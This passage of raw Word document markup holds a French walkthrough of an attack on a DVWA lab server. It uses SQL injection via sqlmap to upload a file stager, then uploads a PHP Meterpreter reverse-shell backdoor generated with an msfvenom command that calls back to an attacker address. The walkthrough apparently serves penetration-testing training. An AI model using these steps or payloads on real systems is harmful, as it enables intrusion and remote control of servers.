        <w:t xml:space="preserve">Il essaie de télécharger le fichier sur « /xampp/htdocs/ » en utilisant des techniques d’injection SQL. Dès que le fichier est téléchargé; il enverra INFO </w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>« </w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rStyle w:val="Accentuation"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>le formateur de fichiers a été téléchargé avec succès sur / xampp / htdocs /</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> " et vous obtiendrez os-shell du PC victime. Autre qu’ici, il montre </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>également le chemin du formateur de fichiers où vous pouvez télécharger manuellement votre porte dérobée, regardez l’URL surlignée:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10232569" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="004F762E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.1.105:80/tmpurufu.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5ED5C2"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643B382F"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4EE75291"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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6883AD35" wp14:editId="1E98AE96">
            <wp:extent cx="5760720" cy="3809365"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1116203636"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03636" name="Image 1" descr="Une image contenant texte&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3809365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B57694F"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036FAD02"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6E4CC6C4"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12725161"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46A8B999" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="000A6530" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6530">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Explorer File Stager dans le navigateur :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E507BC" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="004F762E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A669960" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Explorez l’URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>:http://192.168.1.105/tmpurufu.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> dans le navigateur. À partir de la capture d’écran ci-dessous, vous pouvez lire l’en-tête de la page Web « </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Accentuation"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>sqlmap file uploader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> » qui vous permettra de parcourir votre porte dérobée sur le serveur Web (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>) et plus tard, nous pourrons télécharger cette porte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D16EF2A" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E1D853" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A34DF96" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="004F762E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09726BDD" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6530">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Générer une porte dérobée PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A0C61F" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="000A6530" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="03DD35A8" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="004F762E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Préparons le fichier php malveillant avec msfvenom que nous pouvons télécharger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58602FD1" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F8F8"/>
        <w:spacing w:before="75" w:after="195"/>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.109 lport=4444 -f raw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D175132" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="004F762E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Copiez le code de &lt;?php vers die() et enregistrez-le dans un fichier avec .php extension. J’ai enregistré la porte dérobée en tant que </w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rStyle w:val="Accentuation"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t> sur le bureau et je vais plus tard navigateur ce fichier à télécharger sur le serveur Web. D’autre part, chargez le framework Metasploit en tapant </w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t> et démarrez </w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>multi/handle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0292D711" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="626E6C48" wp14:editId="413D0469">
            <wp:extent cx="5760720" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="436818657"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18657" name="Image 5" descr="Une image contenant texte&#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981200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="565149DE" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="078BA751" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6530">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Télécharger et exécuter la porte dérobée PHP Msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139E747E" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="000A6530" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="40E7C3BD" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="004F762E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cliquez sur </w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>l’onglet Parcourir </w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pour sélectionner votre fichier backdoor </w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(shell.php),</w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> puis cliquez sur </w:t>
      </w:r>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>télécharger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164D0BD2" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="004F762E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CDF0C74" wp14:editId="73EDB5F3">
            <wp:extent cx="4476750" cy="2069983"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="149974819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1659" cy="2076877"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CB28D2" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F762E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GÉNIAL!!! Ici, il montre que le fichier d’administration est téléchargé, ce qui signifie que le shell de porte dérobée est téléchargé</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E9B63D" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4101139C" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="004F762E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="016A1621" wp14:editId="5DDFA45D">
            <wp:extent cx="4105275" cy="2310223"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9372769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2664" cy="2314381"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="615A0C28" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5691351E" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B514F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pour exécuter le fichier de porte dérobée sur la machine cible, exécutez URL:</w:t>
      </w:r>
      <w:r w:rsidRPr="003B514F">
        <w:rPr>
          <w:rStyle w:val="Accentuation"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>192.168.1.105/shell.php</w:t>
      </w:r>
      <w:r w:rsidRPr="003B514F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> dans le navigateur et vous recevrez une connexion inverse via multi/handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAFB0E5" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="003B514F" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E21F15F" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67B15C59" wp14:editId="1A30C276">
            <wp:extent cx="5572125" cy="2990850"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1889974239"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74239" name="Image 2" descr="Une image contenant texte&#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2125" cy="2990850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37359B7C" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="003B514F" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B514F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ici, nous avons notre session de compteur 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9AB2F3" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BA0F392" wp14:editId="48AD058D">
            <wp:extent cx="3874770" cy="1789604"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="752110948"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10948" name="Image 1" descr="Une image contenant texte&#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3224" cy="1793508"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCFD205" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="003B514F" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>l existe plusieurs types de backdoor, le plus connu est le C99-WebShell qui se présente de cette façon après avoir l’injecter sur votre site cible :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B8D711" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="22"/>
